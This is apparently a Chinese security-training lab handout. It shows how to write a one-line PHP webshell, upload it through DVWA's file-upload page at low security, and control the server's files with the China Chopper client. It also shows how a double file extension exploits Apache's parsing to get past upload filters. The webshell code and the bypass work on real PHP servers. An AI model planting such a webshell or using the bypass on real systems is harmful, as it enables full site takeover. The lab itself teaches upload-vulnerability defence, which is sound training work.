利用中国菜刀连接WebShell
【实训目的】
1.认识文件上传漏洞的危害;
2.能够熟练使用中国菜刀连接WebShell。
3.能够明白文件解析漏洞的危害。
【实训步骤】
步骤1、编写一句话木马
在桌面上新建文本文件ceshi.php,用记事本等文本编辑工具,将其内容修改
为:?php@eval($_POST[pass]);?,存盘退出即编写完成一句话木马。
步骤2、登录DVWA系统,选择文件上传页面
在DVWASecurity当中选择low选项,并提交。然后选择upload,出现如下
界面:
图5-4DWA文件上传漏洞界面
步骤3、上传木马文件
在上图所示的界面中,点击“浏览”按钮,选择新建的ceshi.php文件,点击
“upload”按钮,就完成了上传。同时,系统提示:../../hackable/uploads/ceshi.php
succesfullyuploaded!,这意味着文件是上传到了应用程序中的hackable/uplads目
录下。
图5-5DWA文件上传结果
步骤4、通过中国菜刀连接ceshi,php文件
(1)打开菜刀应用程序,在界面的空白占击中键,在菜单中选择添加。出
现如下添加SHELL界面:
图5-6中国菜刀连接一句话木马界面
在地址栏处填写详细的连接地址,保证能够访问到ceshi.php文件;在其右
侧栏中填写连接密码,实质就是木马$_POST数组的下标。选择完成脚本语言及
编码方式之后,点击右下角处“添加”按钮。就出现如下界面:
图5-7中国菜刀连接一句话木马连接
(2)双击该界面下的连接,就会连接到一句话木马ceshi.php。出现如下界
面:
图5-8中国菜刀连接一句话结果
此时,就如本地资源管理器一样管理服务器端的文件了。
步骤4、验证Apache文件解析漏洞。
将ceshi.php的名字修改为ceshi.php.owf.rar,然后按照步骤2、步骤3操作,
出现同样的结果,说明Apache文件解析的机制,导致其按照php文件进行解析。
【实训总结】
1.文件上传漏洞危害极大,可以利用一句话木马控制整个网站。
2.WEB容器文件解析漏洞可能会导致过滤措施失效,在进行文件过滤时需
要特别注意。